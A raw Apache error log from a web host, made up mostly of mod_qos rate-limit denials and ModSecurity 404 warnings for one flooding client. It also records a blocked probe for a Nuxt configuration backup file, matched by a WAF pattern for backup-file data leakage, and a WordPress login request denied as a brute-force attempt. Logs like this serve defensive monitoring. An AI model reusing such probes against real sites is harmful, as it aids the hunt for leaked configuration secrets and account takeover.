[Tue May 26 19:54:08.446421 2026] [security2:error] [pid 93868:tid 94315] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GqgAAAcg"]
[Tue May 26 19:54:08.556072 2026] [qos:error] [pid 86490:tid 86649] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2DgAAAKI
[Tue May 26 19:54:08.562276 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2EAAAAK0
[Tue May 26 19:54:08.562821 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2EQAAALM
[Tue May 26 19:54:08.562923 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtCFZMwN0DpLVWo6K2EgAAAMo
[Tue May 26 19:54:08.566162 2026] [qos:error] [pid 93576:tid 93765] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCGDRMqfxdEDkoszNsgAAADU
[Tue May 26 19:54:08.568553 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2FQAAAMQ
[Tue May 26 19:54:08.568762 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2FAAAAN0
[Tue May 26 19:54:08.595472 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2FgAAAOY
[Tue May 26 19:54:08.597144 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2GAAAALc
[Tue May 26 19:54:08.597153 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2FwAAANI
[Tue May 26 19:54:08.708426 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2GQAAAJc
[Tue May 26 19:54:08.711210 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCGDRMqfxdEDkoszNtwAAAEE
[Tue May 26 19:54:08.712037 2026] [qos:error] [pid 86490:tid 86631] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2GgAAAJA
[Tue May 26 19:54:08.713133 2026] [qos:error] [pid 86490:tid 86654] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2GwAAAKc
[Tue May 26 19:54:08.715195 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCGDRMqfxdEDkoszNuAAAABQ
[Tue May 26 19:54:08.720461 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2HAAAAL0
[Tue May 26 19:54:08.720693 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2HQAAAPw
[Tue May 26 19:54:08.725827 2026] [security2:error] [pid 86490:tid 86639] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nuxt.config.mjs.bak"] [unique_id "ahWtCFZMwN0DpLVWo6K2HgAAAJg"]
[Tue May 26 19:54:08.743087 2026] [qos:error] [pid 86490:tid 86721] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2HwAAAOo
[Tue May 26 19:54:08.747122 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2IAAAALI
[Tue May 26 19:54:08.748327 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2IQAAALk
[Tue May 26 19:54:08.859441 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2JwAAAMo
[Tue May 26 19:54:08.860250 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCGDRMqfxdEDkoszNugAAAA0
[Tue May 26 19:54:08.861095 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2KAAAALM
[Tue May 26 19:54:08.862189 2026] [qos:error] [pid 86490:tid 86726] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2KQAAAO8
[Tue May 26 19:54:08.862242 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtCGDRMqfxdEDkoszNuwAAAGM
[Tue May 26 19:54:08.871758 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2KgAAAN4
[Tue May 26 19:54:08.871958 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2KwAAAM4
[Tue May 26 19:54:08.890520 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2LQAAAMQ
[Tue May 26 19:54:08.897488 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2LgAAAN0
[Tue May 26 19:54:08.900013 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K2LwAAAOY
[Tue May 26 19:54:09.008956 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2MgAAALw
[Tue May 26 19:54:09.009095 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCWDRMqfxdEDkoszNvgAAAHs
[Tue May 26 19:54:09.009258 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCWDRMqfxdEDkoszNvQAAAFg
[Tue May 26 19:54:09.011018 2026] [qos:error] [pid 86490:tid 86729] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2NAAAAPI
[Tue May 26 19:54:09.011388 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2MwAAANk
[Tue May 26 19:54:09.022438 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2NQAAAJc
[Tue May 26 19:54:09.024378 2026] [qos:error] [pid 86490:tid 86631] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2NgAAAJA
[Tue May 26 19:54:09.039470 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2NwAAALs
[Tue May 26 19:54:09.047013 2026] [qos:error] [pid 86490:tid 86661] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2OAAAAK4
[Tue May 26 19:54:09.049999 2026] [qos:error] [pid 86490:tid 86624] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2OgAAAIk
[Tue May 26 19:54:09.156570 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2PAAAAJg
[Tue May 26 19:54:09.156942 2026] [qos:error] [pid 93576:tid 93795] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCWDRMqfxdEDkoszNvwAAAFM
[Tue May 26 19:54:09.157360 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCWDRMqfxdEDkoszNwAAAAGw
[Tue May 26 19:54:09.159943 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2PQAAAME
[Tue May 26 19:54:09.163174 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2PgAAAMo
[Tue May 26 19:54:09.173030 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2PwAAALM
[Tue May 26 19:54:09.177604 2026] [qos:error] [pid 86490:tid 86726] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2QAAAAO8
[Tue May 26 19:54:09.188914 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2RgAAAQI
[Tue May 26 19:54:09.198336 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2SAAAAOY
[Tue May 26 19:54:09.200848 2026] [qos:error] [pid 86490:tid 86720] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2SQAAAOk
[Tue May 26 19:54:09.276792 2026] [security2:error] [pid 93868:tid 94300] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GpQAAAbk"]
[Tue May 26 19:54:09.277229 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GngAAAgk"]
[Tue May 26 19:54:09.290448 2026] [security2:error] [pid 86490:tid 86662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB1ZMwN0DpLVWo6K1hAAAAK8"]
[Tue May 26 19:54:09.295291 2026] [security2:error] [pid 86490:tid 86699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB1ZMwN0DpLVWo6K1lQAAANQ"]
[Tue May 26 19:54:09.315535 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB2DRMqfxdEDkoszNhwAAAF4"]
[Tue May 26 19:54:09.317278 2026] [security2:error] [pid 86490:tid 86644] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB1ZMwN0DpLVWo6K1iQAAAJ0"]
[Tue May 26 19:54:09.332877 2026] [security2:error] [pid 93868:tid 94318] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GsQAAAcs"]
[Tue May 26 19:54:09.339352 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB2DRMqfxdEDkoszNiwAAACM"]
[Tue May 26 19:54:09.340556 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GswAAAg0"]
[Tue May 26 19:54:09.340861 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCGDRMqfxdEDkoszNoAAAADw"]
[Tue May 26 19:54:09.341535 2026] [security2:error] [pid 86490:tid 86685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K12AAAAMY"]
[Tue May 26 19:54:09.343049 2026] [security2:error] [pid 86490:tid 86656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K12wAAAKk"]
[Tue May 26 19:54:09.345454 2026] [security2:error] [pid 93868:tid 94291] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GrgAAAbA"]
[Tue May 26 19:54:09.349745 2026] [security2:error] [pid 86490:tid 86655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB1ZMwN0DpLVWo6K1igAAAKg"]
[Tue May 26 19:54:09.362055 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB2DRMqfxdEDkoszNkQAAAC8"]
[Tue May 26 19:54:09.364992 2026] [security2:error] [pid 93868:tid 94275] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GsAAAAaA"]
[Tue May 26 19:54:09.376407 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCEqK9k_ZUB2Vp25GvAAAAa4"]
[Tue May 26 19:54:09.377804 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB2DRMqfxdEDkoszNjgAAAC0"]
[Tue May 26 19:54:09.379179 2026] [security2:error] [pid 86490:tid 86634] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K12gAAAJM"]
[Tue May 26 19:54:09.386007 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB2DRMqfxdEDkoszNjwAAAF0"]
[Tue May 26 19:54:09.395371 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB2DRMqfxdEDkoszNigAAAGc"]
[Tue May 26 19:54:09.401839 2026] [security2:error] [pid 93868:tid 94264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GrQAAAZU"]
[Tue May 26 19:54:09.402140 2026] [security2:error] [pid 93868:tid 94358] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCEqK9k_ZUB2Vp25GwAAAAfM"]
[Tue May 26 19:54:09.402157 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCEqK9k_ZUB2Vp25GxAAAAfU"]
[Tue May 26 19:54:09.414928 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCGDRMqfxdEDkoszNpwAAACA"]
[Tue May 26 19:54:09.422086 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCGDRMqfxdEDkoszNpQAAAHU"]
[Tue May 26 19:54:09.427937 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCEqK9k_ZUB2Vp25GwgAAAd0"]
[Tue May 26 19:54:09.429897 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCGDRMqfxdEDkoszNqQAAAEc"]
[Tue May 26 19:54:09.430242 2026] [security2:error] [pid 93868:tid 94278] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GsgAAAaM"]
[Tue May 26 19:54:09.443097 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCEqK9k_ZUB2Vp25GwwAAAec"]
[Tue May 26 19:54:09.449207 2026] [security2:error] [pid 93868:tid 94306] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCEqK9k_ZUB2Vp25GxwAAAb8"]
[Tue May 26 19:54:09.458612 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K17AAAAMA"]
[Tue May 26 19:54:09.523777 2026] [security2:error] [pid 86490:tid 86609] [remote 148.72.247.18:43022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.247.72.148.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2aAAAmXY"], referer: https://tea.canopykaapi.com/wp-login.php
[Tue May 26 19:54:09.561278 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtCWDRMqfxdEDkoszN1AAAAEw
[Tue May 26 19:54:09.565732 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtCWDRMqfxdEDkoszN1gAAAEU
[Tue May 26 19:54:09.565745 2026] [qos:error] [pid 93576:tid 93828] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtCWDRMqfxdEDkoszN1wAAAHQ
[Tue May 26 19:54:09.635570 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCWDRMqfxdEDkoszN2gAAAD8
[Tue May 26 19:54:09.637118 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2mAAAAMA
[Tue May 26 19:54:09.640252 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2mQAAAMs
[Tue May 26 19:54:09.640895 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2mgAAAOA
